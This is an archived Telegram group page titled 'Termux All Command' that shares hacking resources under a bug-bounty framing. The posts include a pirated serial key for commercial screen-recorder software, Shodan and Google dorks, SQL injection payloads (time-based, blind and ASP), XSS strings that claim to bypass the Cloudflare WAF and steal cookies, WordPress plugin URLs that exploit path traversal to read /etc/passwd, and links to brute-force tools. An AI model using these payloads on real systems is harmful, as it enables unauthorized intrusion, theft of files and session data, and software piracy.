اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Termux All Command [Telegram Group]
رفتن به کانال در Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
نمایش بیشتر1 186
مشترکین
+324 ساعت
+187 روز
+4830 روز
آرشیو پست ها
Software Name : Zd soft screen recorder
Link : https://www.zdsoft.com/screen-recorder/download.html
Zd soft screen recorder serial key
Name : Novahax.com
Emil : nemo@snd.org
Key : MKB7E-MSD8A-SEAYF-WY3FY-GD400
Some Shodan Dorks that might useful in Bug Bounty.
1. org:"http://target. com"
2. http.status:"<status_code>"
3. product:"<Product_Name>"
4. port:<Port_Number> “Service_Message”
5. port:<Port_Number> “Service_Name”
6. http.component:"<Component_Name>"
7. http.component_category:"<Component_Category>
8. http.waf:"<firewall_name>"
9. http.html:"<Name>"
10. http.title:"<Title_Name>"
11. ssl.alpn:"<Protocol>"
12. http.favicon.hash:"<Favicon_Hash>"
13. net:"<Net_Range>" (for e.g. 104.16.100.52/32)
14. http://ssl.cert.subject.cn:"<http://Domain .com>"
15. asn:"<ASnumber>"
16. hostname:"<hosthame>"
17. ip:"<IP_Address>"
18. all:"<Keyword>"
19. “Set-Cookie: phpMyAdmin”
20. “Set-Cookie: lang="
21. “Set-Cookie: PHPSESSID"
22. “Set-Cookie: webvpn”
23. “Set-Cookie:webvpnlogin=1"
24. “Set-Cookie:webvpnLang=en”
25. “Set-Cookie: mongo-express="
26. “Set-Cookie: user_id="
27. “Set-Cookie: phpMyAdmin="
28. “Set-Cookie: _gitlab_session”
29. “X-elastic-product: Elasticsearch”
30. “x-drupal-cache”
31. “access-control-allow-origin”
32. “WWW-Authenticate”
33. “X-Magento-Cache-Debug”
34. “kbn-name: kibana”
Sql Injection Payload
Payload : 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
Blind SQL Injection payload
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
Bypass Cloudflare WAF (XSS without parentheses)
javascript:var{a:onerror}={a:alert};throw%20document.domain
#xss #bugbountytips #infosec
Tips :- Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"
📍 ZERO-ATTACKER
Zero-attacker is an multipurpose hacking tool with over 15+ multifunction tools
https://lnkd.in/enjK2yP2
Cloud Flare Bypassed :)
Payload: 10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.cookie)%20>
PoC: https://lnkd.in/dZpH-TcT
This repo has a huge collection of bug bounty reports sorted by vulnerabilities such as XSS, CSRF, IDOR, LFI and more.
Do check it out 🔥
GITHUB LINK: https://lnkd.in/gY4BT9a
Awesome Google Dorks
List of operators and example queries in Google to search for:
- IOT devices
- google drive documents
- movies
- login pages
- files with emails and other contact info
and more.
GitHub: https://github.com/Tobee1406/Awesome-Google-Dorks
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️Wordpress Endpoints to look -
check this if you have these plugin. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Wordpress:
BruteForce:
https://github.com/entr0pie/wp-multi-bruteforce
https://github.com/BlackXploits/WPBrute
https://github.com/recepgunes1/WordPress-Brute-Force
https://github.com/DrW3b/wpfighter
https://github.com/22XploiterCrew-Team/WpCrack
https://github.com/n00py/WPForce
https://github.com/momos1337/wp-bruteforce
https://github.com/CalfCrusher/WPHunter
Recon:
https://github.com/blkzy/wprecon
https://github.com/cmhedrick/wposter
https://github.com/IamLizu/wpdetect
https://github.com/Jamalc0m/wphunter
HaxUnit - A tool that combines active, passive subdomain enumeration, port scanning, and vulnerability discovery tools altogether.
✨ Features
● Subdomain Enumeration: Uses tools like Subfinder, DNSx, and custom bruteforce methods.
● Port Scanning: Utilizes Naabu for fast port scanning across discovered subdomains.
● Vulnerability Scanning: Integrates Nuclei for detecting security issues across web applications.
● WordPress Scanning: Uses WPScan to identify vulnerabilities in WordPress installations.
● Acunetix Integration: Provides optional integration with Acunetix for web application security scanning
https://github.com/Bandit-HaxUnit/haxunit
